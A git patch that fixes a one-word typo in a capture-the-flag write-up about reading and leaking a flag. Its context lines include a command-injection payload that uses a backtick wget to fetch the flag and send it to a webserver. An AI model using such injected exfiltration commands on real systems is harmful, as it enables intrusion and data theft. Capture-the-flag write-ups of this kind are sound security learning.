From a146d5304e0ad04949e0f2f974ba982c26785c01 Mon Sep 17 00:00:00 2001 From: Timber Date: Sun, 2 Jun 2024 16:40:53 +0200 Subject: Fix typo --- even-more-flags.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) (limited to 'even-more-flags.md') diff --git a/even-more-flags.md b/even-more-flags.md index 9cc1e85..d06fe2c 100644 --- a/even-more-flags.md +++ b/even-more-flags.md @@ -116,6 +116,6 @@ For that the idea is to read the flag and make an http request to some webserver http:./ & wget ?data=`wget localhost:1337/flag -O -` ``` -And indeed, if we run this in our docker, we can see the fake flag being submitted in the docker logs, and the fake flag arriving in our server docs. +And indeed, if we run this in our docker, we can see the fake flag being submitted in the docker logs, and the fake flag arriving in our server logs. If we now use this exploit url on the remote, we **receive our flag!** -- cgit v1.2.3